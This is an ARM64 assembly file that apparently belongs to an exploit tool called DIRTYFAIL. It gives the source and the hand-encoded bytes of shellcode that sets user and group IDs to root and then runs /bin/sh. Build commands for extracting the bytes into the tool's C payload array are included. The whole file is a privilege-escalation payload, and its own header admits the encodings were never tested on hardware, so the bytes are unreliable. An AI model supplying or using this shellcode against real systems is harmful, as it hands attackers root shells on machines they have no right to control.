/*
 * DIRTYFAIL — aarch64 (ARM64) shellcode for --exploit-su
 *
 * Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
 * for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
 * `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
 *
 * Build for byte-extraction:
 *
 *   aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
 *   aarch64-linux-gnu-objcopy -O binary -j .text \
 *     exploit_su_aarch64.o exploit_su_aarch64.bin
 *   xxd -i exploit_su_aarch64.bin
 *
 * The resulting byte array should match `shellcode_aarch64[]` in
 * `src/exploit_su.c`. If it doesn't, the C array is wrong and needs
 * to be regenerated from this source.
 *
 * Functional equivalent (in C-like pseudocode):
 *
 *     setuid(0);
 *     setgid(0);
 *     execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
 *
 * STATUS: HAND-ENCODED — VERIFY BEFORE DEPLOYING TO PRODUCTION.
 * The byte array in src/exploit_su.c was produced by manually
 * cross-referencing each instruction against the ARMv8-A reference
 * manual; no aarch64 hardware was available to run the resulting
 * shellcode end-to-end. Use this .S file to regenerate via the
 * assembler if you need confidence.
 */

.text
.global _start
_start:
    /* setuid(0) — syscall 146 (0x92) on aarch64 */
    movz    x0, #0                       /* d2 80 00 00 */
    movz    x8, #146                     /* d2 80 12 48 */
    svc     #0                           /* d4 00 00 01 */

    /* setgid(0) — syscall 144 (0x90) */
    movz    x0, #0                       /* d2 80 00 00 */
    movz    x8, #144                     /* d2 80 12 08 */
    svc     #0                           /* d4 00 00 01 */

    /* Build "/bin/sh\0" in x9.
     *
     * As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
     *   bits  0..15 = 0x622f  (chars '/' 'b' in low->high order)
     *   bits 16..31 = 0x6e69
     *   bits 32..47 = 0x732f
     *   bits 48..63 = 0x0068
     */
    movz    x9, #0x622f                  /* d2 8c 45 e9 */
    movk    x9, #0x6e69, lsl #16         /* f2 ad cd 29 */
    movk    x9, #0x732f, lsl #32         /* f2 ce 65 e9 */
    movk    x9, #0x0068, lsl #48         /* f2 e0 0d 09 */

    /* Push the string to the stack (sp -= 16; [sp] = x9). */
    str     x9, [sp, #-16]!              /* f8 1f 0f e9 */
    mov     x9, sp                       /* 91 00 03 e9 — string ptr */

    /* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
    sub     sp, sp, #16                  /* d1 00 43 ff */
    str     xzr, [sp, #8]                /* f9 00 07 ff — argv[1] = NULL */
    str     x9, [sp, #0]                 /* f9 00 03 e9 — argv[0] = ptr */

    /* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd) */
    mov     x0, x9                       /* aa 09 03 e0 */
    mov     x1, sp                       /* 91 00 03 e1 */
    mov     x2, xzr                      /* aa 1f 03 e2 */
    movz    x8, #221                     /* d2 80 1b a8 */
    svc     #0                           /* d4 00 00 01 */